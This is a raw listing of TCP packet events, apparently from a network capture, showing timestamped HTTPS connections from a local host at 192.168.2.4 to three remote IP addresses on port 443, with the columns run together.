                                                                                                                                                                                            Dec 27, 2024 20:23:31.909730911 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:31.910790920 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:31.911120892 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:31.911129951 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:32.689690113 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:32.689793110 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:32.689853907 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:32.743221045 CET49743443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:32.743273973 CET44349743172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:33.418785095 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:33.418869972 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:33.419003010 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:33.419338942 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:33.419373035 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.752363920 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.752548933 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.753618002 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.753652096 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.753866911 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.760797977 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.761641979 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.761686087 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.761811018 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.761852980 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.761989117 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762038946 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762216091 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762268066 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762481928 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762533903 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762792110 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762835979 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762855053 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.762883902 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.763078928 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.763120890 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.763166904 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.763258934 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.763303041 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803339958 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803548098 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803611040 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803653002 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803687096 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803769112 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:34.803809881 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:37.312877893 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:37.312967062 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:37.313077927 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:37.313220024 CET49744443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:37.313257933 CET44349744172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:37.411437035 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:37.411484003 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:37.411571980 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:37.411907911 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:37.411921978 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:38.671031952 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:38.671123981 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:38.676163912 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:38.676182032 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:38.676408052 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:38.677670956 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:38.677695036 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:38.677736998 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459378004 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459455013 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459553957 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459867954 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459889889 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459903955 CET49745443192.168.2.4172.67.166.49
                                                                                                                                                                                            Dec 27, 2024 20:23:39.459908962 CET44349745172.67.166.49192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.601212025 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:39.601305962 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:39.601428986 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:39.601772070 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:39.601805925 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.243438959 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.243554115 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.245783091 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.245829105 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.246076107 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.247281075 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.287328959 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.770836115 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.770890951 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.770972013 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.771231890 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.771274090 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.771301985 CET49746443192.168.2.4185.161.251.21
                                                                                                                                                                                            Dec 27, 2024 20:23:41.771332026 CET44349746185.161.251.21192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.934159994 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:41.934254885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:41.934446096 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:41.942279100 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:41.942311049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.165169001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.165270090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.166975021 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.167005062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.167378902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.172228098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.215373039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777194023 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777255058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777297974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777296066 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777328968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777369022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777373075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777389050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777435064 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.777448893 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.792707920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.792768002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.792778969 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.800915003 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.801027060 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.801038027 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.850178957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.896682024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.943941116 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.943973064 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.970900059 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.971025944 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.971038103 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.975639105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.975683928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.975693941 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.991033077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.991101980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.991118908 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.991132021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:43.991394997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:43.998778105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.006445885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.006495953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.006508112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.014317036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.014415026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.014425993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.022237062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.022299051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.022310019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.029829025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.029881001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.029891968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.037590027 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.037698030 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.037708998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.051321983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.051378012 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.051407099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.058358908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.058410883 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.058463097 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.058473110 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.058535099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.088459015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.131443024 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.160895109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.163198948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.163247108 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.163256884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.173443079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.173451900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.173502922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.173511028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.182691097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.182750940 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.182760000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.182800055 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.186609983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.186654091 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.190772057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.190779924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.190829992 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.199033976 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.199042082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.199091911 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.207267046 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.207276106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.207331896 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.215667009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.215723991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.219877005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.219930887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.225886106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.225946903 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.231822968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.231887102 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.234844923 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.234904051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.240807056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.240859985 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.246784925 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.246867895 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.352499008 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.352585077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.356045961 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.356115103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.361006021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.361082077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.366168022 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.366230965 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.368675947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.368741989 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.373413086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.373476982 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.377782106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.377846956 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.380316973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.380378008 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.384577036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.384660006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.389118910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.389178991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.391546011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.391611099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.396083117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.396167994 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.400908947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.400998116 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.403186083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.403244019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.407423019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.407504082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.410948038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.411012888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.415437937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.415507078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.419903040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.419981003 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.421969891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.422035933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.426520109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.426593065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.431190014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.431262016 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.433315039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.433387995 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.437705994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.437772036 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.544234991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.544322968 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.545214891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.545281887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.549015045 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.549066067 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.552768946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.552834034 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562091112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562103033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562135935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562170029 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562215090 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.562248945 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.573293924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.573318958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.573359966 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.573379993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.573410034 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.584793091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.584841013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.584891081 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.584928036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.584950924 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.596440077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.596462011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.596512079 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.596527100 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.596550941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.607831001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.607851028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.607894897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.607918978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.607954979 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.619623899 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.619649887 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.619708061 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.619731903 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.619770050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.629112005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.629147053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.629189968 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.629206896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:44.629234076 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.678313971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:44.741666079 CET44349747172.67.208.58192.168.2.4
